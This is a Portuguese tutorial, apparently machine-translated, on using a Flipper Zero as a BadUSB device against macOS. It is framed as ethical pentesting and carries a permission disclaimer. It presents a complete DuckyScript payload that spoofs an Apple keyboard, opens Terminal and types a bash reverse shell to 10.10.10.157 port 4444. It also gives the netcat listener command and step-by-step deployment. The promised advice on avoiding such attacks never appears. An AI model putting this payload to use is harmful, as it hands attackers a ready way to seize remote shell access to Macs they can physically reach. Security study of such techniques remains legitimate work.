Este artigo é um exemplo de como usar o Flipper Zero como um dispositivo Ethical Petesting BadUSB e como evitar ser vítima de tal exploração. Não use isso em computadores que você não possui ou tem permissão para usar. Este código não tenta se esconder de sistemas de detecção de intrusão (IDS), sistemas de prevenção de intrusão (IPS), sistemas de detecção de rede, firewalls ou software antivírus (AV).
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
Comando | Descrição |
---|---|
ID 05ac:021e Apple:Teclado | Esta linha diz ao macOS que nosso Flipper Zero é realmente um teclado Apple. Se você não usar esta linha, o macOS exibirá a caixa de diálogo Assistente de configuração do teclado, que fará com que seu script falhe. |
ATRASO | Este comando instrui o sistema operacional a aguardar um período de tempo. Se não usarmos esses atrasos, o script será executado muito rápido e falhará. |
ESPAÇO GUI | Pressiona a tecla Apple Command e a barra de espaço para abrir a janela 'Spotlight Search'. |
Terminal STRING | Insere a string 'Terminal' na janela de pesquisa do Spotlight |
DIGITAR | Pressione a tecla ENTER ou Return em seu teclado. Depois de pressionar a tecla ENTER, o macOS inicia a janela do Terminal (/Aplicativos/Utilitários/Terminal) |
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 | Este comando insere o texto na janela do terminal que estabelece uma conexão com o servidor Netcat escutando em 10.10.10.157 na porta 4444 |
Altere o endereço IP em 10.10.10.157 e a porta 4444 para o endereço IP e a porta do seu servidor.
Salve este arquivo em seu disco como rev_shell_macos.txt . Não há nenhuma organização de subdiretório no diretório badusb no Flipper Zero, portanto, se você estiver usando várias cargas úteis para diferentes sistemas operacionais, use uma convenção de nomenclatura que signifique algo para você, para que você saiba o que ela faz.
Selecione e clique duas vezes no ícone do cartão SD para visualizar o conteúdo.
Localize e arraste o arquivo rev_shell_macos.txt que criamos anteriormente para a pasta badusb .
$ nc -nlvp 4444
Comando | Opções |
---|---|
nc | comando netcat |
-nlvp | ( n ) sem resolução de DNS, ( l ) escuta a conexão de entrada, ( v ) saída detalhada, ( p ) porta |
4444 | Número da porta para escutar |
Agora que nosso ouvinte Netcat está pronto e aguardando uma conexão de entrada, podemos prosseguir com o ataque Flipper Zero BadUSB.
A parte difícil está feita. O arquivo Flipper Zero BadUSB reverse_shell_macos.txt é gravado, movido para o Flipper Zero e o ouvinte Netcat está aguardando uma conexão.
Navegue até o arquivo DuckyScript que copiamos na etapa anterior. Se você não vir este arquivo, então você o copiou para o diretório errado. Selecione rev_shell_macos e clique no botão Executar.
Ao ver o alerta Conectar a USB , você pode conectar seu Flipper Zero à porta USB do seu iMac ou MacBook. Clique no botão Executar.
Você pode observar o progresso do seu script BadUSB na janela principal. Quando o status atingir 100%, a carga útil estará completa e você poderá remover o Flipper Zero.
Se você estiver observando o monitor do computador do iMac, poderá ver o exploit enquanto ele executa o DuckyScript. O ouvinte Netcat em nosso servidor Ubuntu exibe os resultados da solicitação bem-sucedida.
Você pode usar comandos regulares do Linux como whoami , pwd , ls ou cd para navegar no sistema de arquivos e manipular o sistema operacional.